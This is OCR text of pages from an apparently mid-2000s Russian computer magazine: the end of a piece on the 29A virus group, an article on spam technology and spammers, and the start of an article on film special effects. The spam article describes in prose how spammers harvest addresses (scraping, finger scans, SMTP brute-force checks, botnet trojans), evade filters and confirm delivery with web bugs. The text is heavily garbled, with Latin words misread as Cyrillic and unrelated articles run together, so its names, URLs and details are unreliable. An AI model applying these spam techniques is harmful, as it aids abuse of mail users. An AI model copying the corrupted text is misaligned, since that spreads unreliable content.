распространяться между РС и компьютерами 
Арріе. Эсперанто стал одним из самых сложных 
вирусов в истории, и подвиг автора Мг. Запбтап 
удалось повторить немногим вирусмейкерам. 
ЗІаттег 

Скандально известный червь, написанный в 
2003 году экс-мембером 29А Веппу и вызвав- 
ший несколько лет назад настоящую эпидемию 
в Интернете. Заражает серверы, работающие 
под МісгозоК ЗОІ_ Зегѵег 2000. После попада- 
ния на компьютер непрерывно отсылает свой 
код через порт 1434 на случайные машины в 
Сети и запускает его самостоятельно, исполь- 
зуя ошибку в ЗОІ_. Занимает всего 376 байт и 



живет только в памяти компьютера, не остав- 
ляя копий на винте. Изменений в системе ника- 
ких не делает, но сильно замедляет сетевую 
работу и работу компьютера в целом. 1 декаб- 
ря чешская полиция арестовала автора, кото- 
рый к этому времени уже ушел из группы и ра- 
ботал на антивирусную компанию 2опег 
ЗоКѵѵаге. Веппу признался, что действительно 
написал ЗІаттег, но никогда не запускал его 
в Сеть. Он только выложил исходники для оз- 
накомления, которые кто-то скомпилировал, 
и выпустил червя в свободное плаванье. 

СаЫг 

Датой рождения этого червячка можно считать 
14 июня 2004 года, когда ѴаІІег/29А отослал 
свое детище на анализ антивирусным компани- 
ям. СаЫг — первый червь для мобильных теле- 
фонов, работающих под ЗутЬіап ОЗ. Распрост- 
раняется он, маскируясь под защитную утилиту 
СагіЬе Зесигііу Мападег, и после того, как юзер 
соглашается принять файл, заражает систему. 
После этого на дисплее телефона появляется 
надпись СаЫг, которую также можно увидеть 
при каждом включении мобильника. Следую- 
щим этапом становится поиск других телефо- 
нов в радиусе действия сигналов ВІиеІооІЬ, и 
если такой телефон находится (он должен ра- 
ботать под ЗутЬіап), то отсылает свою копию 
на него. В отличие от писишных собратьев, 
СаЫг прекращает попытки заражения, если 
юзер откажется принимать файл. Антивирус- 
ные компании расценили червя как неопасного. 
Впоследствии вышло несколько модификаций 
СаЬіг'а под цифрами .Ь, .с, и Д имеющих незна- 
чительные изменения в коде, чтобы обойти зап- 
латки на телефоны для более ранних версий. 
ѴѴіпСЕ.РиІз 

Первый известный вирус для РоскеІРС, предс- 
тавленный ВаИег/29А в июле 2004 года. Вирус до- 
вольно простой, заражается через запуск файла 
и инфицирует АРМ-девайсы. Интересно, что зве- 
рек даже переспрашивает юзера: «Мне действи- 
тельно можно распространяться? Да/Нет», и 
приступает к работе после положительного отве- 
та. РЫз относится к безвредным вирям и, прик- 
репляя себя ко всем незараженным экзешникам, 
не вносит никаких изменений в систему. 
Напоследок хочу дать список людей, которые в 
разные времена состояли в группе 29А и сдела- 
ли определенный вклад в развитие ѴХ-сцены: 
Мг. Запсітап, Тер, АпіЬаІ І_ес1ег, АѴѴ, ВІабе 
Вітпег, Оогсіоп ЗЬитѵѵау, Огіуо, І_еидіт Зап, 
Мг. ѴѴЬіІе, ^ску Оѵѵегіу, ѴігизВизІег, ѴѴіпІегтиІе, 
ТЬе ЗІид, Ѵеспа, Рагктап, Неигізііс, ВаіааЦ 
Веріііе, Зирег, Зоріпку, ТЬе Мепіаі РгіІІег, 
2отЬіе, Веппу, ВитЫеЬее, І_еІЬаІМіпсІ, І_огсІ 
Эиіиз, Ргіггу, Мапбгадоге, ѴѴЬаІе © 












“Разработчики успели потрудиться 
и нэд графикой которая и без того 
быта на высоте. Теперь и 
комар носа не подточит*. 

Страна Игр. №13, 2005 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ [СЦЕНА] ВЗЛОМ ИМПЛАНТ ]РС_2<ЖЕ] РЕВВІІМ НЬЮСЫ 



Антология 

спама 

Технологии 
на службе спамеров 

КОГДА КАЖДЫЙ ДЕНЬ Я ВЫГРЕБАЮ 

из своих почтовых ящиков ПО 

200 ПИСЕМ РЕКЛАМНОГО МУСОРА, 
МНЕ НАЧИНАЕТ КАЗАТЬСЯ, ЧТО ЭТИ 
НАКАЗАНИЯ СЛИШКОМ МЯГКИЕ. 
СПАМ СТАЛ НАСТОЯЩЕЙ ЧУМОЙ XXI 
ВЕКА. И, ЕСЛИ В БЛИЖАЙШИЕ ПАРУ 
ЛЕТ СПЕЦИАЛИСТЫ НЕ ПРИДУМАЮТ 
ЭФФЕКТИВНЫЙ СПОСОБ БОРЬБЫ С 
НЕЙ, ИНТЕРНЕТ ЖДУТ МРАЧНЫЕ 

ВРЕМЕНА I тіпсІѵѵОгк (тіпсІѵѵОгк@датеІапсІ.ги) 



[борьба со спамом] В США рассылка спама 
нарушает пользовательское соглашения прак- 
тически всех провайдеров и может привести к 
отключению. Так же в Америке с декабря 
2003 года действует САІМ-ЗРАМ Асі, в кото- 
ром прописаны стандарты и ограничения на 
рассылку коммерческих сообщений. Если ты 
собираешься заниматься такой рассылкой, то 
должен получить разрешение у Федеральной 
Торговой Комиссии. Хотя специалисты считают 
акт неэффективным и даже приписали ему но- 
вое название: Ѵои САЫ-ЗРАМ (ты можешь спа- 
мить). За последние годы спам принял угрожа- 
ющие масштабы, и на борьбу с ним выступили 
многие крупные компании, включая Ооодіе и 
МісгозоГС. На одной из пресс-конференций Билл 
Гейтс пообещал искоренить спам в Интернете в 
течение двух лет, хотя пока не ясно, каким обра- 
зом это будет осуществлено. Сейчас МісгозоТС 
занимается поиском основных источников спа- 
ма и борется с ними в судебном порядке. Свою 
лепту вносят и провайдеры, через которых про- 
ходит изрядная доля рекламного трафика, но 
сделать они могут немного. Да, есть фильтры, 
но большинство спама они не задерживают, а 
если сделать выборку еще жестче, то вместе с 
трэшем будут удаляться обычные письма, что 
для многих людей хуже, чем выгребать по 200 
рекламных сообщений в день. 

Специально для борьбы со спамерами была изоб- 
ретена система сарісііа. Так как для отправки боль- 
шого количества мессаг в 90-х годах спамеру нуж- 
но было иметь кучу мыльных аккаунтов, их пачка- 
ми регили на бесплатных емейл-серверах. Процесс 
этот был автоматическим. В 1997 году Андрей 
Бродер предложил способ, предотвращающий ав- 
торегистрацию. При заполнении анкеты на стра- 
ничке появляется картинка, содержащая сгенери- 
рованный случайным образом ряд чисел или букв. 
Юзеру предлагается ввести эту последователь- 
ность для продолжения регистрации. Так как это — 
картинка, компьютер не может распознать числа и 
буквы, сделать это может только человек. 
Некоторые компании (та же МісгозоТС) для пол- 
ного истребления спама, предлагают вводить 
плату за отправление каждого сообщения. Сим- 
волическую для частных лиц, но внушительную 
для спамеров, которые отправляют письма мил- 
лионами. Что-то вроде почтовых марок. Но с 
другой стороны, если уже сейчас спамеры ис- 
пользуют для рассылки писем компьютеры юзе- 
ров, ничто не помешает возложить на этих са- 
мых юзеров плату за отправление сообщений. 
Пока самым эффективным решением остаются 
антиспамовые фильтры. Чтобы обойти их, спа- 
меры прибегают к использованию разных трю- 







ков. Например, видоизменяют слова, находящи- 
еся в «черном списке». Так, слово «порнушка» 
может быть изменено на «пронушка». Фильтр 
не заметит подвоха, а человек прочитает за- 
шифрованное словечко именно так, как нужно. 
Слово может быть написано с разделением букв 
через пробелы: «пор нуш ка». Использование 
НТМІ_ в мессагах дает спамерам больше воз- 
можностей. Например, если вставить в слове 
между буквами символы с цветом, аналогичным 
фоновому, то человек их не увидит, а компью- 
тер, безразличный к цветам, не сможет прочи- 
тать исковерканный текст. Спамеры взяли на 
вооружение и идеи сарІсИа, вставляя в свои со- 
общения картинки с текстом, распознать кото- 
рый фильтры не в состоянии. В последнее вре- 
мя появился интеллектуальный спам, в котором, 
помимо навязчивой рекламы, можно встретить 
абзацы из художественных книг и стихотворе- 
ний. Это применяется опять же для того, чтобы 
сбить с толку фильтры, которые определяют ре- 
левантность слов в письме. Обратный адрес то- 
же обрабатывается: спамеры вставляют в стро- 
ку Ргот автоматически сгенерированные имена 
(типа Эоіпп В. Зіаіег) и часто используют анало- 
гичный с получателем домен. Например, мне 
часто приходят письма якобы из (ЗатеІапсГа. 



в 1997 году Адам Бэк представил новую сис- 
тему НазПсазИ для борьбы со спамом и атаками 
ЭоЗ. Идея заключается в том, что отправитель 
сообщения прикрепляет к шапке строчку, ука- 
зывающую на то, что он потратил определенное 
время на отправку письма. Например, решил 
простенькую задачку. Понятное дело, что спа- 
меры не могут себе позволить уделять на каж- 
дое письмо даже пару секунд времени, поэтому 
ИазИсазІі гарантирует, что письма, включаю- 
щие заветную строку, не являются спамом. 
Полностью избежать спама в своем почтовом 
ящике можно двумя способами. Первый — ниг- 
де в Интернете не публиковать этот ящик. Да- 
же будучи видоизмененным (тіпс1ѵѵ0гк[а1]дапгіе- 
ІапсІ.ги), он может быть распознан усовершен- 
ствованными спамерскими ботами и добавлен 
в базу. Поэтому рекомендую для работы завес- 
ти незасвеченный мыльник и дополнительно 
иметь пару ящиков для общих нужд. Второй 
способ — настроить фильтр, который блокиру- 
ет каждое входящее сообщение, но отправите- 
лю отсылает письмо с предложением подтвер- 
дить отправку нажатием на ссылку. После это- 
го человек будет занесен в белый список, и все 
дальнейшие письма от него будут благополуч- 
но доходить по назначению. 




ТГ~| ПОКУПКА БАЗЫ ЕМЕЙЛОВ 

1 I Этот способ самый простой, используют его обычно новички или небольшие спамерские компа- 
нии. В большинстве стран продажа электронных адресов незаконна, но есть страны, где это не запре- 
щено. Продавцы рекламирует СЭ с базами емейлов на сайтах, хостящихся именно там. Каждый сидюк 
обычно содержит около миллиона проверенных адресов и стоит в районе $50. Заказать можно почтой 
или скачать непосредственно с сайта, оплатив покупку. Базы спамеров бывают специализированные 
и общие. Специализированные стоят намного дороже, так как адреса в них отсортированы и включа- 
ют только тех, кто потенциально заинтересован в рекламируемом товаре. 



ПОДПИСКА НА КОНФЕРЕНЦИИ ІІЗЕМЕТ 



ІІЗЕЫЕТ является лакомым куском для спамеров, так как все участники конференций, оставляя 
сообщения, заодно публикуют свой емейл. Достаточно подписаться на самые популярные конфы и за- 
пустить программу, автоматически собирающую адреса из текстовых файлов. Таким же образом мож- 
но обработать конференции на Ооодіе Огоирз и различные популярные рассылки. 



СКАНИРОВАНИЕ ХОСТОВ 



Некоторые спамеры, знакомые с ІІІМІХ, используют сканеры портов для поиска серверов с запу- 
щенным Ііпдег-сервером. Как известно, команда Ііпдег в никсах дает детальную информацию о зашед- 
ших в систему юзерах. Существуют программы, которые автоматически обновляют запрос о пользова- 
телях и совмещают полученную инфу (обычно достаточно знать зарегистрированное имя) с доменом 
сервера, в результате чего получаются реальные адреса. 

Способ четвертый: брутфорс 

Технология похожа на подбор пароля по словарю, только подбирается не пароль, а реальные ящики 
в крупной почтовой системе. ЗМТР-протокол позволяет без отправки сообщения проверять, существу- 
ет ли запрашиваемый ящик. Спамеру нужно только натравить специальную программу на список час- 
то используемых имен (аіех, тіке, рПп и т.д.), которая превратит их в адреса с добавлением собачки 
и имени домена, затем автоматически проверит, какие из них рабочие. Так как популярными почтовы- 
ми сервисами типа таіі.ги, ШЬох.сот, аоі.сот пользуются миллионы людей, практически любое сло- 
во служит кому-то логином. Активные адреса будут отправлены спамеру и добавлены в общую базу. 



СПАМБОТЫ 



Очень популярен метод использования специальных программ «пауков», которые рыскают по сай- 
там в поисках заветных слов со значком @ . Так как юзеры часто оставляют на форумах и в гостевых свои 
реальные мыльники, за день урожай одного такого «паучка» может составить сотни тысяч адресов. 
Минусом является то, что многие, полученные таким образом, е-мейлы давно не используются, поэтому 
приходится дополнительно проверять каждый из них. Нередко фокус работы пауков сужают, натравли- 
вая их на коммерческие или специализированные ресурсы. Так как многие компании на своих сайтах 
публикуют инфу и контакты своих сотрудников, это дает спамерам тысячи халявных валидных адресов. 



ВИРУСЫ И ЧЕРВИ 



Пожалуй, самый эффективный способ, который стал использоваться спамерами не так давно. 
Есть спамеры, которые паразитируют на чужих вирях, более продвинутые челы создают и распростра- 
няют их сами. Представители первой категории, после эпидемии таких вирей, как ЗоВід и МіМаіІ, ска- 
нируют порты в поисках зараженных машин и, воспользовавшись открытой дыркой, оставляют в сис- 
теме троян. Он копирует адреса из папки «Входящие» установленного мейлера и отправляет их на уда- 
ленный адрес. Компьютерные черви чаще используются не для сбора адресов, а для создания бот-се- 
тей из машин «зомби». Таким образом, рассылать рекламный трэш будет уже не спамер, а простые 
пользователи, компьютеры которых в фоне получают инструкции с сервера и отправляют спам другим 
юзерам. Через один компьютер-зомби может проходить миллионы писем в неделю, гарантируя при 
этом безопасность спамера. 

Важной частью работы спамеров является проверка получения юзером рекламы. Простейший способ 
— добавить в сообщение строчку Веіигп-Весеірі-То: зраттег@зрат.пеІ, которая доставит уведомление 
о том, что мессага получена. Правда, работает это не во всех мейлерах, да и некоторые предпочитают 
отключать пункт с уведомлением в настройках. Другой способ — заставить юзера самостоятельно отве- 
тить на письмо. Например, тебе может прийти такой перл: «Вы получили это сообщение, так как подпи- 
саны на нашу ежедневную христианскую рассылку. Если вы не хотите получать новые выпуски — вы мо- 
жете отписаться, нажав на эту ссылку». Как только ты нажимаешь на линк, твой адрес в базе спамера 
автоматически помечается как «проверенный». Думаю, ты, как и я, получал письма с вопросом: «Зачем 
вы прислали мне эту фотографию?». Неподготовленный человек ответит: «Какую фотографию?» и тем 
самым выдаст реальность своего ящика. Любимым трюком спамеров для проверки адресов является 
использование ѴѴеЬ Вид. Так называют скрытый ярлык в НТМЬписьме, автоматически подгружающий 
с сервера крошечное изображение размером 1x1 пиксель и работающий по принципу баннеров. Сам 
факт того, что картинка была скачана компьютером юзера, говорит о том, что он получил письмо. 




те самые консервы ЗРАМ 



| [сбор адресов и рассылка] 

Чтобы разослать миллионы сооб- 
щений, нужно раздобыть миллионы 
адресов. Делают спамеры это раз- 
ными способами. 

При рассылке сообщений спамеры 
придерживаются трех правил: аноним- 
ность, дешевизна и сложность выслежи- 
вания. В 90-х годах, чтобы избежать 
отключения провайдера и скрыть свой 
адрес, спамеры работали через систему 
переадресации ореп таіі геіауз, позво- 
ляющую отсылать письма любому отп- 
равителю с любого адреса. Потом ре- 
лейники стали редкостью, и спамеры пе- 
решли на использование прокси серве- 
ров, меняя их как перчатки (впрочем, 
как и своих провайдеров). Неплохим по- 
мощником спамеру также стал СОІ 
скрипт РогтМаіІ.рІ, позволяющий отсы- 
лать отзывы на мыло через НТМЬфор- 
му на сайте. Есть программы, которые 
корректируют адрес получателя так, что 
«отзыв» спамера получит не только ав- 
тор сайта, но и тысячи людей. Нередко 
спамеры создают собственные таіі-сер- 
веры с динамическим диалап-соедине- 
нием. При каждом коннекте выделяется 
новый айпишник, что усложняет работу 
правоохранительным органам. Правда, 
крупные провайдеры теперь закрывают 
такие серверы, поскольку владельцами 
большинства почтовых диалап-хостов 
являются спамеры. 

Спам стал популярен, потому что это са- 
мый дешевый вид рекламы. Несмотря 
на то, что 99.9% получателей сразу 
же удаляют рекламное сообщение, всег- 
да остается 0.1% людей, которые внима- 
тельно прочитают и клюнут на предло- 
женное. Этот процент окупает все рас- 
ходы, потраченные на рассылку. Причем 
емейл-спамом дело не ограничивается. 
Любые популярные публичные сервисы 
могут стать жертвой спамеров, начиная 
интернет-пейджерами типа ІСО, закан- 
чивая веб-блогами. Уже не редкость, 
что мобильный спам, где юзерам высы- 
лаются ЗМЗ с рекламой через интернет- 
гейты, а в недалеком будущем ожидает- 
ся спам по ѴоІР-сетям (ІР-телефония). 




и/и/и /.саисе.огд — Коалиция против коммерческой электронной рекламы. 
МірУ/зрат.аЬизе.пеі/зрат — борцы со спамом в Интернете 
шшш.іі.сот/іпіетеі/гоЬоіз/ргостаіІ/цз — подборка инфы о таіі-фильтрах 
ѵѵѵѵѵѵ.ійеіпсгебіЫезраттизеит .сот — онлайновый музей спама 
йПр://зі.сІо.йотеипіх.огд/8ратТесІіпідиез.йітІ?іпсІех — подробный обзор 



технологий спамеров 

ШрУ/шшш.Щз.огдДацз/пеі-абизе-Щ/зрат-Щ — аіі.зрат РАО 
йіф://еп.\л/ікіребіа.огд/\л/ікі/Е-таіІ_зрат — страничка о спаме на сайте \А/ікіребіа 
мш.зратІамз. сот — список законов разных стран относительно спама 
ѵѵшѵѵ.зратсор.пеі — место, куда можно пожаловаться на спам 
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«король спама» Алан Ральский 



дом Алана 



антиспамовое 
решение 
от Лаборатории 
Касперского 




ИНТЕРЕСНЫЕ ФАКТЫ О СПАМЕ 

Кажд 



:т 



ый день спамеры отправляют около зо миллиардов сообщений. 

Ъ доли мирового спама составляют рассылки 150 спамеров. 

Спамерской Меккой является США (особенно Флорида), 

откуда поступает основная часть всей рекламы. Второе место занимает Китай. 

Самым популярным видом спама являются письма, содержащие предложение быстро разбогатеть (37%), 
Следом идет реклама порно-контента (25%), софтварные предложения (18%) и линки на веб-сайты (6%). 
На данный момент в рунете количество спама составляет 80% от всех писем. 

Первым спамером, которого приговорили к тюремному заключению, стал Говард Кармак, который 
в 2003 году разослал 825 миллионов рекламных сообщений. Так как американский закон о нелегальности 
спама в то время еще не вступил в силу, Кармака судили за фальсификацию документов и впаяли 
максимально возможный срок — 7 лет. 



[известные спамеры] Имена спамеров 
обычно неизвестны, так как они тщательно 
скрывают любую информацию о себе и не све- 
тятся в инете. Но несколько крупных игроков 
все-таки оказались на виду. Расскажу тебе о 
трех самых ярких из них. 

СЭНФОРД УОЛЛЭС 

Самопровозглашенный король спама и самый 
ненавистный в Америке конца 90-х спамер, 
в 1995 году вместе со своим партнером 
Уолтом Райнсом основал компанию СуЬег 
Рготоііопз, специализирующуюся на рассыл- 
ке рекламы по емейл. А после проведения аг- 
рессивной маркетинговой кампании в Интер- 
нете, быстро занял лидирующие позиции 
в этой области, став заодно главным постав- 
щиком адресов для остальных спамеров. 
СуЬегргото не просто зарабатывала на спаме 
деньги, она разрабатывала новые приемы обхо- 
да фильтров и технологии, позволяющие повы- 
сить эффективность рассылок. Фальшивые об- 
ратные адреса, ретрансляция, множественная 



адресация — эти и другие техники были изобре- 
тены в компании Уоллэса и в дальнейшем ис- 
пользовались ведущими спамерскими контора- 
ми. В 1996 году Сэнфорд настолько осмелел, 
что подал в суд на крупнейшего американского 
провайдера Атегіса Опііпе за то, что он блокиро- 
вал, поступающие от СуЬегРгото, письма. Суд 
заявление отклонил, а в следующем году уже 
АОІ_, а также многие другие ІЗР США подали иск 
на компанию Уоллэса. В ответ на это, Сэнфорд 
пообещал создать собственную фирму-провай- 
дер и координировать свои рассылк и чере з нее. 
Но сделать это не успел. В апреле 98-го года 
«король спама» объявил о своем уходе из спам- 
мерского бизнеса с целью создать легальную 
ОрМп компанию (орі-іп подразумевает, что рек- 
ламная рассылка проводится с согласия пользо- 
вателей). Никто не верил в его чистые помыслы 
и связываться с его новой конторой не хотел, по- 
этому компания быстро закрылась. Дальнейшая 
деятельность Сэнфорда Уоллэса была связана с 
рекламой сетевой порнографии, а позже с его 
новой компанией ЗтагІВОТ, которая распрост- 



раняла трояны и предлагала за $30 быстрое ре- 
шение по их устранению. В январе 2005 года 
на ЗтагІВОТ подали иск, и Уоллэсу пришлось 
свернуть свой троянский бизнес. Какими будут 
следующие проекты короля, никто не решается 
предсказать. 

АЛАН РАЛЬСКИЙ 

Еще один король спама, которого сетевые ана- 
литики считают самым плодовитым спамером в 
истории. В 80-х годах он занимался не совсем 
законным страхованием, на чем зарабатывал 
500 тысяч долларов в год. В начале 90-х по- 
пался на фальсификации банковских докумен- 
тов, получил три года условно и лишился лицен- 
зии. Оставшись ни с чем, Ральский продал свою 
старенькую машину и купил 2 компьютера, что- 
бы попробовать себя в компьютерном бизнесе. 
Самым интересным и прибыльным оказалось 
рассылать рекламные сообщения, чем он, 
собственно, и занялся. И к концу 90-х стал од- 
ним из самых влиятельных спамеров в мире, 
в 2002 году Алан дал интервью газете ТПе 
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Слово ЗРАМ появилось 
в далеком 1937 году в 
результате конкурса на 
лучшее название для 
новых свиных консервов 
компании НогпеІ Роосіз. 
Звучную фразу ЗИоиІсІег 
оі Рогк апсі нАМ («сви- 
ные лопатки и окорока») 
предложил актер Кен- 
нет Дейнью, брат вице- 
президента компании, 
который и выиграл приз 
в $100. Консервы были 
вкусными, питательны- 
ми и, что немаловажно 
для того времени, деше- 
выми. Неудивительно, 
что очень быстро они 
стали чуть ли не нацио- 
нальным блюдом Аме- 
рики. Из спама можно 
было приготовить сот- 
ни разных блюд, и ком- 
пания НогпеІ Роосіз — 
вместе с обильной рек- 
ламой — постоянно под- 
кидывала новые рецеп- 
ты. Жители других стран 
подтрунивали над новой 
пищевой любовью аме- 
риканцев, а известный 
британский Воздушный 
цирк Монти Пайтона да- 
же выпустил серию 
скетчей под названием 
зрат, зрат, зрат. В нем 
показывалась америка- 
нская пара, зашедшая в 
ресторан поесть, но, что 
бы они не заказывали, 
все блюда оказывались 
по-разному оформлен- 
ными консервами ЗРАМ. 



В 70-х годах звездный 
час продукции НогпеІ за- 
кончился, началась эра 
компьютерных сетей. 
Многие считают, что 
прародителем компью- 
терного спама стало 
агентство АВРА, кото- 
рое рассылало по Агра- 
пеі разную техническую 
информацию, интерес- 
ную далеко не всем. Но 
тогда это были просто 
письма, которые воспри- 
нимались вполне нор- 
мально и не носили «пи- 
щевого» названия. 



В 1986 году в конфе- 
ренциях ІІзепеІ появи- 
лось множество одина- 
ковых сообщений от 
некоего Дэйва Родеса, 
который рекламировал 
новую финансовую пи- 
рамиду. Топик гласил: 
«Заработай быстро ку- 
чу денег», а в письмах 
содержалась инструк- 
ция, как это сделать. 
Дэйв с завидным упор- 
ством продолжал дуб- 
лировать свои тексты, 
и они настолько прие- 
лись подписчикам, что 
их стали сравнивать с 
вездесущими в 40-х го- 
дах консервами ЗРАМ. 



Но по-настоящему попу- 
лярным среди компью- 
терщиков слово стало в 
1 993 году, когда Ричард 
Депью написал прог- 
рамму для автомати- 
ческого моделирования 
конференций ІІзепеІ, 
и из-за ошибки в коде 
она вместо удаления 
одного сообщения про- 
дублировала его 200 
раз в пеѵѵз.асітіп.роіісу 
пеѵѵздгоир. Свалившие- 
ся в больших количест- 
вах письма окрестили 
спамом, и через нес- 
колько лет, когда это 
явление стало частым, 
слово прочно заняло 
свое место в компью- 
терном лексиконе. 



24 октября 2003 года ок- 
ружной суд Санта-Клары 
(Калифорния) обязал 
двух молодых людей 
выплатить штраф в раз- 
мере двух миллионов 
долларов за незакон- 
ную рассылку реклам- 
ных сообщений. 



4 ноября 2004 года за 
многочисленные нару- 
шения Сап Зрат Асі 
суд приговорил Дже- 
реми Джеймса, одного 
из самых влиятельных 
спамеров в Интерне- 
те, к 9 годам тюремно- 
го заключения. 




Оеігоіі Ыеѵѵз, которое было опубликовано на по- 
пулярном компьютерном портале ЗІазбоІ. Рас- 
суждения спамера вызвали волну возмущения у 
читателей, и народ решил скормить «бизнесме- 
ну» его же товар. Один из постоянных посетите- 
лей портала отыскал реальный почтовый адрес 
Ральского и запостил его на Слэшдоте. После 
этого тысячи компьютерщиков отправились ис- 
кать в Сети фирмы, рассылающие бумажные 
рекламные рассылки, бесплатные каталоги и 
прочую макулатуру. В графе «кому» они вводили 
адрес Алана, и все это добро непрерывным пото- 
ком свалилось на спамера. «Эти люди сошли с 
ума! Они подписали меня на все бесплатные рас- 
сылки в этом гребаном мире», — пожаловался 
журналистам Алан. Но сам продолжал распрост- 
ранять миллиарды мессаг по всему Интернету. 

В сентябре 2005 года ФБР нанесла визит в 
дом 60 -летнего Алана Ральски и конфисковала 
всю компьютерную технику, включая несколько 
мощных серверов, финансовые документы и все 
другие вещи, которые указывали на спамерскую 
деятельность. Координирование всех операций 



происходило и менно там, так как Ральски конт- 
ролировал около 200 мейл-серверов, каждый 
из которых мог отправлять 650 тысяч реклам- 
ных писем в час. Король спама не раскаивался в 
своих действиях: «Я не спамер, я бизнесмен в 
области электронной рекламы». Тем не менее, 
пожилому бизнесмену по законам Штатов, где 
запрещена нежелательная рассылка, грозит до 
20 лет тюрьмы и 11 тысяч долларов штрафа за 
каждого юзера, которому он успел навредить. 

ВАРДАН КУШНИР 

Армянин, автор известного в рунете спама от 
«Центра изучения Американского английского», 
с 2003 по 2004 года предложение изучить 
язык получили более 25 миллионов человек в 
России, Украине, Израиле и даже США, причем 
письма поступали регулярно и в видоизменен- 
ной форме. Центр изучения английского нас- 
только вывел из себя рунетчиков, что на борьбу 
со спамером вышли тысячи людей. Одни дела- 
ли это, названивая по оставленному в письмах 
телефону и интересуясь одними и теми же под- 



робностями (от этих разгневанных звонков шел 
основной доход Кушниру, так как оставленный 
телефонный номер был платным. В среднем 
спамер получал ю тысяч долларов в месяц), 
другие проводили ОЭоЗ-атаки на сайт конторы. 
Против Центра выступили даже власти. Запи- 
санное обращение министра связи Андрея Ко- 
роткова с требованием прекратить рассылку, 
провайдер Ооісіеп Теіесот непрерывно прокру- 
чивал по телефонной АІ_С-линии, подключенно- 
го к нему Центра. Из-за действий главного спа- 
мера России некоторые зарубежные мейл-сер- 
веры блокировали поступление любых писем из 
домена.ш, что сделало невозможным переписку 
людей, живущих в разных странах. 

24 июля 2005 года мертвое тело Вардана 
Кушнира нашли в его трехкомнатной квартире 
в центре Москвы. Экспертиза показала, что 
спамер умер в результате нескольких сильных 
ударов по голове. Официальная версия мили- 
ции была такой: Кушнир пострадал в результа- 
те попытки ограбления. Настоящая причина ос- 
талась неизвестной © 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІЛЧІХОЮ [СЦЕНА] ВЗЛОМ ИМПЛАНТ РС_20МЕ РЕВВІІМ НЬЮСЫ 




Технологии на службе Голливуда 



Как создают спецэффекты? 



В ДЕТСТВЕ, КОГДА У МЕНЯ ВПЕРВЫЕ ПОЯВИЛСЯ ВИДАК, Я ПЕРЕСМОТРЕЛ КУЧУ ФИЛЬМОВ ВСЕХ ГОДОВ И ЖАН- 
РОВ. ОСОБЫХ ВПЕЧАТЛЕНИЙ ОНИ У МЕНЯ НЕ ОСТАВИЛИ, И СЕЙЧАС Я ДАЖЕ НЕ МОГУ ВСПОМНИТЬ НАЗВАНИЯ 
БОЛЬШИНСТВА. ЕДИНСТВЕННАЯ КАРТИНА, КОТОРАЯ ТВЕРДО ЗАСЕЛА У МЕНЯ В ПАМЯТИ, — МАТРИЦА. ФИЛЬМЕЦ 
МЕНЯ, ПОМНИТСЯ, ДЕЙСТВИТЕЛЬНО ВПЕЧАТЛИЛ, И НЕ ПОСЛЕДНЮЮ РОЛЬ В ЭТОМ СЫГРАЛИ СПЕЦЭФФЕКТЫ. 
КАК ОНИ ЭТО ДЕЛАЮТ? ТОЛЬКО СЕЙЧАС Я УЗНАЛ ОТВЕТ НА ЭТОТ ВОПРОС I Дмитриев Данил ака хЫІ(5Ігеат@05коІпе1.ш 3344-37-228) 



[процесс] Без спецэффектов не обходится практически ни один совре- 
менный фильм. Взять даже «Трою» или любой другой исторический 
фильм. Казалось бы, куда там современным технологиям, ведь события 
в фильме происходят в III веке до нашей эры. Но тысячи легионеров — 
это не огромная массовка актеров, а модели нарисованные художником. 
Так же как и тучи стрел, которыми усыпали крепость во время осады. 
Перед съемкой картины режиссер консультируется с командой спецов- 
аниматоров и вносит дополнения в сценарий таким образом, чтобы тех- 
ники могли качественно склеить реальный кадр с нарисованной мо- 
делью. Вопреки популярному мнению, спецэффекты разрабатываются 
уже после съемок картины, когда становится ясно, что все отснятое — 
финальный вариант. Далее начинается поиск компании, способной про- 
работать разные эпизоды фильма. При выборе кандидатов учитывают- 
ся такие факторы, как стоимость и продолжительность разработки эф- 
фекта, а также качество проделанной работы аниматором ранее. В слу- 
чае, если поджимают сроки и съемочная группа не укладывается в срок, 
нанять могут сразу несколько компаний. Так что получается, что над од- 
ним эпизодом или даже деталью трудятся десятки людей из разных го- 
родов и стран. Имея хороший бюджет для фильма, режиссер может поз- 
волить себе нанять профессионалов в строго определенных областях 
анимации. Но это не значит, что создатели фильмов любят выкидывать 



деньги на спецэффекты. Многие считают, что в фильме все должно 
быть как можно реальнее, с минимальным вмешательством компьютер- 
ной техники. «Дешевле и реалистичнее» — вот философия современ- 
ных режиссеров, которую они унаследовали от своих «учителей». 
Вспомни фильм «Унесенные ветром», сцену с ранеными на поле боя. 
Тысячи бойцов на заднем плане — это не актеры и не графика, а обыч- 
ные куклы. Нарисовать модель, идентичную оригиналу, тем более, если 
речь идет о человеке — невероятно сложно, поэтому киношники приду- 
мывают разные ухищрения. Например, на съемках фильма «Гибель Им- 
перии» была сцена, когда главному герою снится громадных размеров 
карп. Команда отловила настоящего карпа и пустила его в аквариум. 
Посудину с живой рыбой расположили между героем и камерой, в ре- 
зультате чего получился нужный эффект увеличения. Правда, заставить 
карпа двигаться по задуманной траектории так и не получилось — 
пришлось пустить в ход монтаж. Но пробовали до последнего, режиссер 
и вся команда боялись, что компьютерщики не смогут убедить зрителей 
в подлинности рыбины. Или отгремевший фильм «Ночной Дозор». В 
нем есть интересная сцена, где из ворон образуется вихрь вокруг поез- 
да. В этой сцене нет ни одного настоящего кадра, а ее подготовка заня- 
ла очень много времени. Проблемой были сами вороны. Перед РХ-ко- 
мандой поставили четкую цель — сделать так, чтобы вороны летали как 




«Город мудрецов», смоделированный в 30 он же, но только в ЗЭ-пакете 



НАШИ НА РХ-СЦЕНЕ 

Несмотря на то, что рассадник спецэффектов находится 
в Голливуде, в нашей стране тоже есть люди, способные 
творить чудеса. Вот лишь несколько имен. 

Аркадий Дубинин. По образование программист. В 1993 году 
участвовал в создании спецэффектов к фильму Никиты Ми- 
халкова «Утомленные солнцем». В 2001 году был одним из 
независимых супервайзеров эффектов к фильму «Даже не 
думай!». Работал над такими известными картинами, как 
«Фанат», «Дети Арбата», «Ночной Дозор», «Личный номер». 
Андрей Назаров. Работал на студии ОЬіесІіѵе Мизіс, за- 
тем ушел в Останкино на должность звукорежиссера. 

С 2000 года начал активное сотрудничество с телекомпа- 
нией «Вид». Результат — проект «Последний герой». 
Михаил Аранышев. Сотрудник киностудии «Казах- 
фильм». Один из лучших наших специалистов в области 
кинопроизводства и кинообработки. 

Александр Горохов. Продюсер визуальных эффектов, 
